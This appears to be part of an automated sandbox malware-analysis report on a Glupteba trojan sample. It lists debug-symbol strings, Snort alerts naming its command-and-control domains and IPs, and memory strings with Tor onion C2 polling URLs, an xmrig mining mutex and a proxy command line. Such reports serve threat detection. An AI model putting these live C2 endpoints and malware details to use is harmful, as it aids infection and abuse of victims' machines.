Source: Binary string: The module signature does not match with .pdb signature. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: .pdb.dbg source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: '(EfiGuardDxe.pdbx source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ZZC:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: System.Management.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
Source: Binary string: System.Management.ni.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: or you do not have access permission to the .pdb location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Transactions.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Transactions.ni.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: C:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: System.Numerics.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: System.Core.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:49990 -> 185.82.216.50:443
Source: Traffic Snort IDS: 2045697 ET TROJAN DNS Query to Glupteba Domain (twopixis .com) 192.168.11.20:49827 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:49993 -> 185.82.216.50:443
Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:49998 -> 185.82.216.50:443
Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:50002 -> 185.82.216.50:443
Source: Traffic Snort IDS: 2043048 ET TROJAN Observed Glupteba CnC Domain (duniadekho .bar in TLS SNI) 192.168.11.20:50007 -> 185.82.216.50:443
Source: Traffic Snort IDS: 2045697 ET TROJAN DNS Query to Glupteba Domain (twopixis .com) 192.168.11.20:63997 -> 1.1.1.1:53
Found Tor onion address
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d0c9d&uuid=ec87b504-92ea-4d22-a937-161700799581
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d0c9d&uuid=ec87b504-92ea-4d22-a937-161700799581erver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionPUser-Agent: Go-http-client/1.1
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion:80
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Fserver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion:80
Source: csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll
Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: COMPUTERNAME=computerNUMBER_OF_PROCESSORS=16PROCESSOR_REVISION=9e0dPUBLIC=C:\Users\PublicSystemRoot=C:\WindowsC:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466xeSELECT BuildNumber FROM Win32_OperatingSystemGlobal\xmrigMUTEX31337http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exechallenge=e5ec22ece8aaafba&country_code=US&uuid=ec87b504-92ea-4d22-a937-161700799581server5.duniadekho.bar
Source: csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll
Source: csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: SELECT BuildNumber FROM Win32_OperatingSystemGlobal\xmrigMUTEX31337http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNPpuSomC.exeHKEY_USERS\S-1-5-21-3425316567-2969588382-3778222414-1001\Software\Microsoft\e4d2c4f7nnHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exennHbdeCkATuZNPpuSomC.exe
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4E6000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.mscLOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\LocalPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\mountvol.msc
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.exenhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.batstAppC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.cmdd2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.vbsd2c4f7http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.vbed2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.js4d2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.jsed2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.wshd2c4f7C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cmd.exe.mscd2c4f7APPDATA=C:\Windows\system32\config\systemprofile\AppData\Roamingt\e4d2c4f7LOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\Local4d2c4f7PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 13, GenuineIntel7PROCESSOR_LEVEL=6TEMP=C:\Windows\TEMPTMP=C:\Windows\TEMPUSERDOMAIN=WORKGROUPUSERNAME=computer$windir=C:\WindowsZES_ENABLE_SYSMAN=1LOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\LocalPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 13, GenuineIntel
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4E4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://duniadekho.barhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionCommonProgramW6432=C:\Program Files\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCommonProgramW6432=C:\Program Files\Common Files
Source: csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: 